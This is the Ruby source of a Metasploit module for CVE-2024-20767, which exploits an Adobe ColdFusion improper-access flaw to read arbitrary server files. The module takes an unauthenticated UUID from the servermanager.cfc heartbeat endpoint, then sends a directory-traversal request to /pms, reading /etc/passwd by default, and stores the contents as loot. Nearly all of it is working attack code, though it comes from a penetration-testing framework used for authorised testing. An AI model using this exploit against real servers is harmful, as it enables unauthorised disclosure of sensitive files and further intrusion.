Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
Views: 11777
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report89def initialize(info = {})10super(11update_info(12info,13'Name' => 'CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read',14'Description' => %q{15This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version16'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication17token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that18UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.19},20'Author' => [21'ma4ter', # Analysis & Discovery22'yoryio', # PoC23'Christiaan Beek', # Msf module24'jheysel-r7' # Msf module assistance25],26'License' => MSF_LICENSE,27'References' => [28['CVE', '2024-20767'],29['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],30['URL', 'https://jeva.cc/2973.html'],3132],33'DisclosureDate' => '2024-03-12',34'Notes' => {35'Stability' => [CRASH_SAFE],36'Reliability' => [],37'SideEffects' => [IOC_IN_LOGS]38}39)40)4142register_options(43[44Opt::RPORT(8500),45OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),46OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),47OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),48OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),49]50)51end5253def get_uuid54res = send_request_cgi({55'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),56'vars_get' =>57{58'method' => 'getHeartBeat'59}60})61fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res6263# TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.64fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 20065uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text66fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid =~ /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/67uuid68end6970def run71print_status('Attempting to retrieve UUID ...')72uuid = get_uuid73print_good("UUID found: #{uuid}")74print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}")7576traversal_path = '../' * datastore['DEPTH']77file_path = "#{traversal_path}#{datastore['FILE_PATH']}"7879res = send_request_cgi({80'uri' => normalize_uri(target_uri.path, 'pms'),81'vars_get' =>82{83'module' => 'logging',84'file_name' => file_path,85'number_of_lines' => datastore['NUMBER_OF_LINES']86},87'headers' =>88{89'uuid' => uuid90}91})9293fail_with(Failure::Unknown, 'No response received') unless res9495if res.code == 20096print_good('File content received:')97else98fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")99end100101file_contents = []102res.body[1..-2].split(', ').each do |html_response_line|103print_status(html_response_line)104file_contents << html_response_line105end106107stored_path = store_loot('coldfusion.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])108print_good("Results saved to: #{stored_path}")109end110end111112113